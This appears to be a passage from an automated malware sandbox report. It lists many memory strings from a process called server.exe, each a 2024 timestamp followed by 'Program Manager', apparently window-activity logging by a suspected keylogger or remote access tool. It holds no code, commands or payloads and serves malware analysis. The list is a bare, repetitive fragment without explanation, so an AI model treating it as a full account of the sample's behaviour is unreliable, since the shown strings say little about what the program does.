Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 18:58:10 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 07:15:12 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 15:06:52 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 15:11:02 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 23:20:06 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 07:06:32 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 01:39:00 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 11:57:08 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 13:06:29 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 21:42:41 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 10:31:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/28 \| 00:06:34 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 11:57:19 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 05:04:18 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 23:13:43 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 03:03:21 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 03:33:05 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/19 \| 22:57:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 19:31:15 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 17:42:31 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 20:59:29 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 06:03:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 12:18:11 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/07/26 \| 19:24:54 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 19:14:15 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 03:38:42 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 11:28:20 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 12:22:13 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 20:45:29 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/07/27 \| 08:20:23 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 03:48:20 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 03:26:57 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 15:27:30 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/30 \| 04:08:46 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 11:14:37 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 10:20:54 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 04:12:18 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 10:28:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/30 \| 05:30:31 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/17 \| 19:11:49 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 18:27:49 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 11:28:17 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 12:48:32 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 08:41:28 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/19 \| 23:49:18 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 23:27:41 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/28 \| 00:21:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 20:22:43 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 00:27:14 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/07/27 \| 17:51:55 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 12:43:37 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 17:56:25 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 09:08:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 21:03:18 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 04:11:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 20:51:29 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 12:21:32 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 05:51:28 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 19:52:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 04:11:11 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 12:11:55 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 02:33:55 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 19:34:12 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 13:33:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 23:55:46 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 19:00:52 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 05:28:03 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 03:43:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 09:10:44 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 09:00:11 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 13:51:27 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 14:05:28 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 16:14:21 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 23:52:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 20:24:42 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 19:51:00 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 08:16:53 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 11:28:10 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 01:49:49 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 14:32:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 13:13:28 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 13:30:40 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 08:28:56 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 04:53:58 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 08:20:22 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 03:03:46 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 23:48:54 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 08:42:30 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 08:34:02 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/30 \| 04:32:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 22:19:53 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 18:45:03 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 08:40:01 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 11:42:06 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 15:27:58 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 15:07:33 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 13:56:23 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 23:12:00 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 15:14:54 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 15:22:04 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 12:30:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 14:48:05 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 04:20:53 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 02:44:44 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 14:39:17 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 07:09:25 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 11:40:48 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/30 \| 05:32:26 - Program Manager
